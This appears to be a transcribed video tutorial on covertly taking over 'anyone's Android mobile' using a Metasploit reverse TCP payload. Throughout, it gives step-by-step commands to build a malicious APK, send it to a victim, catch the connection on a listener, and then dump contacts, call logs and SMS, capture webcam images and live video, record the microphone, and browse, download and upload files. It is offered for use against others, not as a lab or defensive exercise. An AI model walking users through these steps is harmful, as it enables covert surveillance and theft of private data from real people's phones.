Hello friends, welcome to Tech Tips tutorial. In this tutorial, we are going to see how to hack anyone's Android mobile. So pop up your terminal and type sudo -i to give it root user privilege. Then type ifconfig to get your IP address and see here is your IP address, that is inet. Copy it and then start MSF console. Now to generate payload, we are going to use MSF Venom. So type MSF Venom -p, that is payload, and type of payload is Android meterpreter reverse TCP, and then set lhost as your IP address and L port as 4444 are directed to, let's say, hex.apk. Now it will generate hex.apk a payload. It is see here that it is generated and it is of 9489 bytes, which is stored in root directory. So let's see. Hmm. See here that here is that file. Copy it and send it to your victim. Now start a handler. uh, to start handler, type use multi sorry exploit multi handler. Now set payload and then set lhost as your IP address. Here mine is 192.168.43.106. Sorry, here equal to is not required. And now set L port as 4444. Now we are ready. Now start your exploit. Now it is waiting for a victim to download the APK. Yeah, when victim will install APK, this will get access to that victim's mobile. See here that session 1 has been started. That means victim has installed APK. So now we can access their mobile. Let's say we want to get contacts of victim, contacts list from victim. For that we can type dump contacts. See here the contacts has been dumped into this text file, which is stored in root directory. See here that this are the contact list. Now let's say we want to see call logs For that, type dump call logs call log. So it is in call log file, text file. And if we want to see sms, then type dump sms. See here that it's been saved into this text file. So copy it and open it. See here that here is incoming outgoing call messages, that is sms. Now let's say we want to use a webcam of that mobile. For that we can type webcam, and we want to get snap, right? So webcam snap, and we can specify port number, that is whether we want to use front camera or rear camera. One is for rear camera and two is for front camera. So type -i to use rear front camera. See here that it took a snap from mobile. If we want to change quality of this camera, then we can change by -q, and let's say we want to make it 100. See here that it is of now good quality. And if we want to get live stream from web camera, for that we can type webcam stream, and then -i 2, and call it for quality type -q, and let's say 100. See here that it is streaming in this HTML file. So we need to open this HTML file. See here that here is live stream of from web camera. Here I am showing my laptop, and here is my curtain. And if we want to get access to their memory, that is we want to get access to their shell. For that we can type shell. So now we are in their shell. To check files and directories in shell, type ls, that is list down directories and file. So these are the directories and file. Let's say we want to go into SD card, so type cd SD card, that is change directory to SD card, and then type ls to see files inside it. See, these are the files inside SD card. And now we want to get into download, then type cd download, and here are mp3 files, text files, and jpg file. Now let's say we want to see text inside this text file. So for that we can use cat command, cat followed by text file name. See here that text file contains hello friends text. Now if we want to change directory to previous one, then we can type cd -i minus. So now directory has been changed to previous one, that is SD card. And if we want to change directory to home directory, then we can type cd and tilde sign. Sorry, cd and forward slash. So now we are in root directory, and if we want to download any file from here, then we can type download followed by file name. And if we want to print a current directory inside shell, then we can type pwd, that is print directory. It is showing forward slash, that means it is inside root directory. And if we want to exit from shell, then we can type exit. And now if we want any help, then we can type help. See here that these are the help command. And if we want to record from mic, then we can type record mic. This will record from the mic, and which is saved in this .wav file. Now let's use other commands. If we want to see interfaces connected to mobile, then we can type ifconfig or ipconfig. See here that these are the interfaces connected to that mobile, and we can type ipconfig. It will give same output. Now again type help to get help. And if we want to see webcam, that is cameras, let's say we want to see which are the cameras in mobile, so we can type webcam and list. That is, here is first is front back camera and second is front camera. And if we want to check whether device is rooted or not, then we can type check root. And if we want to send SMS to anyone, then we can type send SMS -d, then add mobile number of receiver, and then -t and the text that you want to send. And if you want to check processes running inside mobile, then you can type ps. See here that these are the processes running in that mobile. And if you want to execute any command, then you can use execute. And if you want to check routing table, that is routing of networks, then you can type route. And if you want to search for any file in a shell, then you can type search followed by file name. And if you want to upload any file, then upload followed by file name. And if you want to make any directory inside directory, then go into that directory by cd and type mkdir followed by directory name that you want to create. And if you want to quit, then you can type quit, that is quit. And if you want to check information of mobile or system, then you can type sysinfo. See here that it is hosted from computer, that is localhost, and OS is Android 5.1, and metadata is Java or Android in Java. So this was tutorial on hacking anyone's Android mobile. Thank you guys. If you like this video, press thumbs up down there, and if you want some more videos like this, subscribe to my channel. And if you have any query, comments down below. Thank you.